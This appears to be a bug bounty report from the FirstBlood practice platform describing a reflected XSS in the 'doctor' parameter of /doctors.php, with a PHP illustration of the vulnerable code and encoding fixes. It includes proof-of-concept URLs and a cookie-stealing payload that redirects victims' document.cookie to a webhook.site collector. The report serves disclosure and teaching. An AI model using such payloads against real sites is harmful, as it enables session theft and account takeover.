FirstBlood-#1127 Reflected XSS
This issue was discovered on FirstBlood v3



On 2022-12-08, pichik Level 4 reported:

Hello zseano,
hope you are doing well, thanks for the next event.

My first bug is a reflected XSS in the /doctors.php endpoint. There is a parameter `doctor` which is reflected in between <script> tags.
Didn't find any better impact yet, so reporting just a simple alert.

We just need to escape ' and separate our code, so it won't throw an error. Here is the payload with a simple alert: ';alert(1);'

POC LINK:

https://032ef87a17cb-pichik.a.firstbloodhackers.com/doctors.php?doctor=%27;alert(document.domain);%27

POC SCREEN:

IMPACT

As I found a way in, I am increasing the impact for this bug as it can be used in the same way as my #1335 report. An attacker can use this bug to append cookies to the URL, send them to his server and steal accounts of doctors. Payload:
doctor=%27;window.location.href=%27https://webhook.site/[attacker-id]?%27%2Bdocument.cookie;%27

ACCOUNT TAKEOVER POC LINK:

https://ab26c404a3be-pichik.a.firstbloodhackers.com/doctors.php?doctor=%27;window.location.href=%27https://webhook.site/[attacker-id]?%27%2Bdocument.cookie;%27

Remediation:

HTML-encoding user-entered input should prevent XSS easily.
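As an added illustration (not FirstBlood's code, and not the reporter's), the three renderings below show the break-out described for the `';alert(1);'` payload and the remediation. It assumes doctors.php is PHP and echoes the parameter into a JS variable named `doctor`; both names are assumptions.

```php
<?php
declare(strict_types=1);

// Vulnerable pattern: the ?doctor= value is concatenated straight into a
// single-quoted JS string literal, so a value containing ' closes the
// literal early and whatever follows runs as script (the reported bug).
function render_vulnerable(string $doctor): string
{
    return "<script>var doctor = '" . $doctor . "';</script>";
}

// The report's remediation: HTML-encode the value. Inside <script> the HTML
// parser does not decode entities, so a ' turned into &#039; can no longer
// close the literal; the script just sees the entity text as string data.
function render_html_encoded(string $doctor): string
{
    $enc = htmlspecialchars($doctor, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return "<script>var doctor = '" . $enc . "';</script>";
}

// Context-matched encoding: emit the value as a JSON string literal and
// hex-escape the HTML-significant characters, so neither quotes nor < > &
// can terminate the string or the script element, and the value survives
// intact for the script to use.
function render_js_encoded(string $doctor): string
{
    $flags = JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT
           | JSON_UNESCAPED_UNICODE;
    $js = json_encode($doctor, $flags);
    if ($js === false) {          // e.g. invalid UTF-8: never echo raw input
        $js = '""';
    }
    return "<script>var doctor = " . $js . ";</script>";
}

// Constructed input: the report's break-out payload.
$sample = "';alert(1);'";
echo "vulnerable:   ", render_vulnerable($sample), "\n";
echo "html-encoded: ", render_html_encoded($sample), "\n";
echo "js-encoded:   ", render_js_encoded($sample), "\n";
```

Marking the session cookie HttpOnly would additionally keep `document.cookie` from exposing it in the account-takeover variant, independently of the output-encoding fix.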

P3 Medium

Endpoint: /doctors.php

Parameter: doctor

Payload: ';alert(1);'


FirstBlood ID: 47
Vulnerability Type: Reflective XSS

The endpoint /doctors.php is vulnerable to reflective XSS via the ?doctor= parameter.